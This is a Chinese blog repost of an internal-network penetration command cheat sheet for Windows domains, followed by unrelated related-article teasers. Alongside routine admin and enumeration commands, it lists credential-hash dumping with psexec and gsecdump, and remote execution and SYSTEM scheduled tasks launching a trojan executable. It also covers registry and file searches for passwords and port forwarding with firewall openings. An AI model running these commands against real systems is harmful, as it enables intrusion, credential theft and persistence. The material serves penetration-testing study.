揭秘内网渗透:命令大全助你轻松测试安全【内网渗透命令大全】

news2024/12/23 23:19:52

网络安全最新课程大纲

感兴趣可留言在这里插入图片描述

1.域常用操作命令:

net group /domain

//获得所有域用户组列表

net group qq_group /domain

//显示域中qq_group组的成员

net group qq_group /del /domain

//删除域中qq_group组

net group qq_group qq /del /domain

//删除域内qq_group 群组中的成员QQ

net group qq_group /add /domain

//增加域中的群组

net group “domain admins” /domain

//获得域管理员列表

net group “enterprise admins” /domain

//获得企业管理员列表

net localgroup administrators /domain

//获取域内置administrators组用(enterprise admins、domain admins)

net group “domain controllers” /domain

//获得域控制器列表

net group “domain computers” /domain

//获得所有域成员计算机列表

net user /domain

//获得所有域用户列表

net user someuser /domain

//获得指定账户someuser的详细信息

net accounts /domain

//获得域密码策略设置,密码长短,错误锁定等信息

nei view /domain

//查询有几个域, 查询域列表

net view /domain:testdomain

//查看 testdomain域中的计算机列表

nltest /domain_trusts

//获取域信任信息

net user domain-admin /domain

//查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息

net config Workstation

//查询机器属于哪个域

net time /domian

//查询主域服务器的时间

echo %logonserver%

//查看登陆到这台服务器的计算机名

net time \192.168.1.1

//查询远程共享主机192.168.1.1的时间

net use \IP\ipc$ password /user:username@domain

//ipc$域内连接

net view \dc2.backlion.com

//查看域控共享情况

dir \dc2.backlion.com\SYSVOL /s /a > sysvol.txt

//列出sysvol日志记录

xcopy \dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c

//远程拷贝到本地sysvol日志

net user /domain bk bk123

//修改域内用户密码,需要管理员权限

net localgroup administartors SEZKL\backlion /add

//将SEZKL域中的用户backlion添加到administrators组中

mstsc /admin

//远程桌面登录到console会话解决hash无法抓出问题

gpupdate/force

//更新域策略

psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u

//从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来

gsecdump -a

//获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值

tasklist /S ip /U domain\username /P /V

//查看远程计算机进程列

2.基本内网渗透命令:

ipconfig/all

//查看IP地址

ipconfig /release

//释放地址

ipconfig /renew

重新获取Ip地址

whoami

//查询账号所属权限

whoami/all

//查看sid值

systeminfo

//查询系统以及补丁信息

tasklist /svc

//查看进程

taskkill /im 进程名称(cmd)

//结束进程

taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)

wmic qfe get hotfixid

//查看已安装过得补丁,这个很实用

wmic qfe list full /format:htable > hotfixes.htm

//详细的补丁安装

wmic qfe

//查询补丁信息以及微软提供的下载地址

ping hostname(主机名)

//显示该机器名的IP

net start

//查看当前运行的服务

net user

//查看本地组的用户

net localhroup administrators

//查看本机管理员组有哪些用户

net user

//查看会话

net session

//查看当前会话

net share

//查看SMB指向的路径[即共享]

wmic share get name,path

//查看SMB指向的路径

wmic nteventlog get path,filename,writeable

//查询系统日志文件存储位置

net use \IP\ipc$ password /user:username

//建立IPC会话(工作组模式)

net use z: \192.168.1.1

//建立映射到本机Z盘

net time \172.16.16.2

//查询共享主机的是

at \172.16.16.2 13:50 c:\windows\2009.exe

//在共享主机上执行

netstat -ano

//查看开放的端口

netstat -an | find “3389”

//找到3389端口

net accounts

//查看本地密码策略

nbtstat –A ip

//netbiso查询

net view

//查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来

echo %PROCESSOR_ARCHITECTURE%

//查看系统是32还是64位

set

//查看系统环境设置变量

net start

//查看当前运行的服务

wmic service list brief

//查看进程服务

wmic process list brief

//查看进程

wmic startup list brief

//查看启动程序信息

wmic product list brief

//查看安装程序和版本信息(漏洞利用线索)

wmic startup list full

//识别开机启动的程序

qwinsta

//查看登录情况

schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR “c:/muma.ex e” /ED 2017/4/7

//添加计划任务

REG query HKCU /v “pwd” /s

//获取保存到注册表中的密码

3.内网网络结常用命令:

tracert IP

//路由跟踪

route print

//打印路由表

arp -a

//列出本网段内所有活跃的IP地址

arp -s (ip + mac)

//绑定mac与ip地址

arp -d (ip + mac)

//解绑mac与ip地址

nbtscan -r 192.168.16.0/24

//通过小工具nbtscan扫描整个网络

netsh firewall show config

//查看防火墙策略

netsh firewall show state

//查看防火墙策略

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl"

//批量扫描内网存活主机

windows自带端口转发:

netsh——interface——ipv6 install

//首先安装IPV6(xp、2003下IPV6必须安装,否则端口转发不可用!)

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22

//将本机22到1.1.1.1的22

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22

netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22

netsh interface portproxy show all

// 查看转发配置

netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22

//删除配置

netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all

//添加防火墙规则,允许连接22:

4.敏感数据和目录:

dir /b/s config.*

//查看所在目录所有config.为前缀的文件

findstr /si password *.xml *.ini *.txt

//查看后缀名文件中含有password关键字的文件

findstr /si login *.xml *.ini *.txt

//查看后缀名文件中含有login关键字的文件

copy con 创建命令:

copy con ftp.bat

//创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功

copy con test.vbs

//创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功

5.dsquery的AD查询工具:

dsquery user domainroot -limit 65535 && net user /domain

//列出该域内所有用户名

dsquery server -domain super.com | dsget server -dnsname -site

//搜索域内所有域控制器并显示他们的DNS主机名和站点名称

dsquery contact

//寻找目录中的联系人

dsquery subnet

//列出该域内网段划分

query user

//查询那些用户在线

dsquery group && net group /domain

//列出该域内分组

dsquery ou

//列出该域内组织单位

dsquery server && net time /domain

//列出该域内域控制器

dsquery site -o rdn

//搜索域中所有站点的名称

dsquery group dc=super,dc=com |more

//搜索在DC=SUPER,DC=COM 域中的所有组

psloggedon.exe

//查询那台主机和用户登录到该主机上

netsess.exe //192.168.1.115

//远程主机上无需管理员权限,查询到主机名和用户

reg query “HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT”

//获取最近mstsc登录的记录

6.DOS常用快捷命令

mspaint 画图工具

calc 计算器

notepad 记事本

taskmgr 任务管理器

osk 打开屏幕键盘

gpedit.msc 组策略

services.msc 本地服务

compmgmt.msc 计算机管理

devmgmt.msc 设备管理器

winver 查看系统版本

magnify 放大镜实用程序

eventvwr 事件查看器

Regedit 打开注册表

resmon 资源监视器

WMIC BIOS get releasedate 查看电脑生产日期

mstsc -f 远程连接(可以全屏)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1620090.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

2024创业项目新方向,智享无人实景直播配合智能贴图数字人,让直播更简单,帮助商家快速引流客户到店,帮助创业者轻松实现梦想!

随着科技的迅猛发展,直播行业也经历了一次又一次的变革和创新。在2024年,AI实景无人直播成为了这个领域的全新宠儿,为商家和观众带来了前所未有的智能、高效体验。这种革命性的直播方式不仅降低了运营成本,还极大地提升了直播的效…

Aigtek功率放大器的工作特点有哪些方面

功率放大器是电子设备中常见的元器件,用于将输入信号的功率增加到所需的输出功率水平。它在各种应用中发挥着重要作用,如音频放大、射频信号处理、通信系统等。功率放大器具有以下几个工作特点: 放大功能:功率放大器主要的工作特点…

怎样快速插入数据

1、30万条数据插入插入数据库验证 1.1、表结构: CREATE TABLE t_user (id int(11) NOT NULL AUTO_INCREMENT COMMENT 用户id,username varchar(64) DEFAULT NULL COMMENT 用户名称,age int(4) DEFAULT NULL COMMENT 年龄,PRIMARY KEY (id) ) ENGINEInnoDB DEFAULT…

Python自学篇2-导入Win32库

Python导入win32模块 导入win32模块可以让我们在Python中使用Windows的API功能,这对于开发需要与Windows操作系统进行交互的应用程序非常有用。 本文将介绍如何导入win32模块,并提供一些代码示例来帮助读者更好地理解。 什么是win32模块? …

【Stable Diffusion系列】(一):AI绘画本地部署教程

目录 一、总览 二、本地部署 1、安装cuda 2、安装python 3、安装git 4、方法一 1)获取安装包 2)update 3)run 5、方法二 1)git clone 2)双击webui-user.bat 3)更新 6、设置启动参数 7、…

LiveNVR监控流媒体Onvif/RTSP常见问题-如何对比监控摄像头延时视频流延时支持webrtc视频流播放超低延时播放

LiveNVR如何对比监控摄像头延时视频流延时支持webrtc视频流播放超低延时播放 1、问题场景2、如何对比延时?3、WEBRTC延时对比4、LiveNVR支持WEBRTC输出5、RTSP/HLS/FLV/RTMP拉流Onvif流媒体服务 1、问题场景 需要低延时的视频流监控播放,之前可以用rtmp…

pytorch-MNIST测试实战

目录 1. 为什么test2. 如何做test3. 什么时候做test4. 完整代码 1. 为什么test 如下图:上下两幅图中蓝色分别表示train的accuracy和loss,黄色表示test的accuracy和loss,如果单纯看train的accuracy和loss曲线就会认为模型已经train的很好了&a…

C++初识--------带你从不同的角度理解引用的巧妙之处

1.对于展开的理解 我们这里的展开包括命名空间的展开和头文件的展开,两者的含义是不一样的: 头文件的展开就是把头文件拷贝到当前的文件里面; 命名空间的展开不是拷贝,而是因为编译器本身默认是到全局里面去找,当我…

【热议】硕士和读博士洗碗区别的两大理论

::: block-1 “时问桫椤”是一个致力于为本科生到研究生教育阶段提供帮助的不太正式的公众号。我们旨在在大家感到困惑、痛苦或面临困难时伸出援手。通过总结广大研究生的经验,帮助大家尽早适应研究生生活,尽快了解科研的本质。祝一切顺利!—…

SWOT分析法:知彼知己的战略规划工具

文章目录 一、什么是SWOT分析法二、SWOT分析法如何产生的三、SWOT分析法适合哪些人四、SWOT分析法的应用场景五、SWOT分析法的优缺点六、SWOT分析实例 一、什么是SWOT分析法 SWOT分析法是一种用于评估组织、项目、个人或任何其他事物的战略规划工具。SWOT是Strengths&#xff…

组态风格的工业可视化大屏,既同步状态又掌控数据,一箭双雕。

可视化大屏中加入了组态图,状态和数据一目了然了,我看还有谁说可视化大屏没啥用啦。 将组态图放入可视化大屏中可以起到以下几个作用: 1. 实时监控: 组态图可以用来实时监控设备、系统或者生产线的运行状态。通过大屏展示&#…

HackMyVM-Alzheimer

目录 信息收集 arp nmap FTP服务信息收集 匿名登陆 关键信息 knock WEB信息收集 信息收集 gobuster 目录爆破 ssh登录 提权 系统信息收集 提权 get root 信息收集 arp ┌──(root㉿0x00)-[~/HackMyVM] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC…

应用于智能装备制造,钡铼IOy系列模块展现其强大的灵活性和实用性

随着科技的飞速发展,智能制造已经成为工业4.0时代的核心驱动力。在此背景下,钡铼技术推出的IOy系列模块以其独特的设计、卓越的性能以及无可比拟的灵活性与实用性,在智能装备制造领域展现出了强大的技术优势和应用价值。 首先,钡…

Excel 冻结前几行

Excel中有冻结首航和冻结首列的选项,但是如果想冻结前几行该怎么操作? 冻结首行或冻结首列 视图 -> 冻结窗格 -> 冻结首行或冻结首列 冻结前几行或前几列 视图 -> 冻结窗格 -> 冻结拆分窗格 具体冻结几行和几列取决于当前选中的单元格。…

力扣HOT100 - 114. 二叉树展开为链表

解题思路&#xff1a; class Solution {List<TreeNode> list new ArrayList<>();public void flatten(TreeNode root) {recur(root);for (int i 1; i < list.size(); i) {TreeNode pre list.get(i - 1);TreeNode cur list.get(i);pre.left null;pre.right…

不同伦敦金网上平台的投资者都在使用的平仓技术

现在几乎是百分之一百的伦敦金交易都在伦敦金网上平台进行。市面上有不同的伦敦金网上平台&#xff0c;那有没有一些交易技术&#xff0c;不论是什么伦敦金网上平台的投资者都喜欢用的呢&#xff1f;答案是肯定的&#xff0c;下面我们就从平仓这个角度来讨论一下伦敦金网上平台…

LeetCode - 11.盛最多水的容器

一. 题目链接 LeetCode - 11.盛最多水的容器 二. 思路解释 利用双指针的思想&#xff0c;定义一个left和reght&#xff0c;left指向首部&#xff0c;right指向尾部&#xff0c;计算当前两个指针所对应的高度构成容器的体积。根据当前双指针所指的高度的大小&#xff0c;然后让…

精益人效,实践为先|第四届狮山人力资源论坛圆满举办

4月19日 &#xff0c;在苏州日航酒店&#xff0c;由中国苏州人力资源服务产业园、苏州高新区人力资源服务产业园指导&#xff0c;盖雅工场、盖雅学苑和盖雅人效研究院主办的 「精益人效 实践为先——第四届狮山人力资源论坛」圆满结束。 700余位企业管理者与人力资源从业者&am…

【每日刷题】Day23

【每日刷题】Day23 &#x1f955;个人主页&#xff1a;开敲&#x1f349; &#x1f525;所属专栏&#xff1a;每日刷题&#x1f34d; &#x1f33c;文章目录&#x1f33c; 1. 138. 随机链表的复制 - 力扣&#xff08;LeetCode&#xff09; 2. 链表的回文结构_牛客题霸_牛客网 …

邂逅JavaScript逆向爬虫-------基础篇之面向对象

目录 一、概念二、对象的创建和操作2.1 JavaScript创建对象的方式2.2 对象属性操作的控制2.3 理解JavaScript创建对象2.3.1 工厂模式2.3.2 构造函数2.3.3 原型构造函数 三、继承3.1 通过原型链实现继承3.2 借用构造函数实现继承3.3 寄生组合式继承3.3.1 对象的原型式继承3.3.2 …